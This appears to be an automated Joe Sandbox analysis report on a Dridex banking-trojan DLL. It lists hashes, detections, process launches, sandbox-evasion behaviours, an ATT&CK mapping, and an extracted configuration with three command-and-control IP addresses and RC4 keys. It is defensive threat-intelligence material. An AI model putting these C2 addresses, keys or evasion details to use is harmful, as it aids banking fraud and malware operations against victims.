Play interactive tour

Edit tour

Analysis Report gsG7jGFk3I

Overview

General Information

Sample Name:	gsG7jGFk3I (renamed file extension from none to dll)
Analysis ID:	392878
MD5:	e8675c9ab1bb95547b902176997e37a1
SHA1:	c088263ed0a68c8b9ffb092d41a53603ae25e69b
SHA256:	6934bf4b117408db966b2c8afc1adde7e8bbb2063b7a284727e44a28a6769bea
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 1712 cmdline: loaddll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 668 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4832 cmdline: rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4516 cmdline: rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4480 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 428 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.495709984.000000006E881000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.rundll32.exe.6e880000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.6e880000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.2.rundll32.exe.6e880000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: gsG7jGFk3I.dll

Joe Sandbox ML: detected

Source: 2.2.rundll32.exe.d50000.1.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.2.loaddll32.exe.1390000.1.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 5.2.rundll32.exe.5a0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: gsG7jGFk3I.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: gsG7jGFk3I.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.289565383.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.357256593.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.289565383.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.357256593.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp, gsG7jGFk3I.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.307603072.0000000004C90000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.307603072.0000000004C90000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: azojr}oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000008.00000002.315809616.0000000000562000.00000004.00000010.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.307603072.0000000004C90000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97
Source: Joe Sandbox View	IP Address: 94.247.168.64 94.247.168.64

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: gsG7jGFk3I.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000005.00000002.495709984.000000006E881000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.6e880000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e880000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E892790 NtAllocateVirtualMemory,	2_2_6E892790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E89218C NtDelayExecution,	2_2_6E89218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E88BC00 NtClose,	2_2_6E88BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E8907CC	2_2_6E8907CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E881494	2_2_6E881494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E8992DC	2_2_6E8992DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E8914D8	2_2_6E8914D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E8884E4	2_2_6E8884E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E88A5A4	2_2_6E88A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E889144	2_2_6E889144

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 428

Source: gsG7jGFk3I.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs gsG7jGFk3I.dll

Source: gsG7jGFk3I.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: gsG7jGFk3I.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1712

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERECBB.tmp

Jump to behavior

Source: gsG7jGFk3I.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 428
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1	Jump to behavior

Source: gsG7jGFk3I.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: gsG7jGFk3I.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.289565383.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.357256593.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.289565383.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.357256593.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp, gsG7jGFk3I.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.307603072.0000000004C90000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.307609698.0000000004C98000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.307603072.0000000004C90000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: azojr}oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000008.00000002.315809616.0000000000562000.00000004.00000010.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000008.00000003.307579539.0000000004C92000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.307574841.0000000004CC1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.307603072.0000000004C90000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6E88F744 push esi; mov dword ptr [esp], 00000000h

2_2_6E88F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 1086

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 657			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 429			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6E8907CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

2_2_6E8907CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 00000008.00000002.316838567.0000000004DB0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000008.00000002.316838567.0000000004DB0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000008.00000002.316838567.0000000004DB0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000008.00000002.316838567.0000000004DB0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6E886DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_6E886DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6E893060 RtlAddVectoredExceptionHandler,

2_2_6E893060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1

Jump to behavior

Source: rundll32.exe, 00000002.00000002.493621011.0000000003170000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.495288767.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: rundll32.exe, 00000002.00000002.493621011.0000000003170000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.495288767.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.493621011.0000000003170000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.495288767.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.493621011.0000000003170000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.495288767.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_6E886DC8

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_6E886DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	OS Credential Dumping	Security Software Discovery111	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gsG7jGFk3I.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.d50000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.2.loaddll32.exe.1390000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
5.2.rundll32.exe.5a0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	gsG7jGFk3I.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392878
Start date:	19.04.2021
Start time:	23:32:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	gsG7jGFk3I (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 53.5% (good quality ratio 50.6%) Quality average: 80% Quality standard deviation: 27.5%
HCA Information:	Successful, ratio: 84% Number of executed functions: 24 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
23:33:21	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
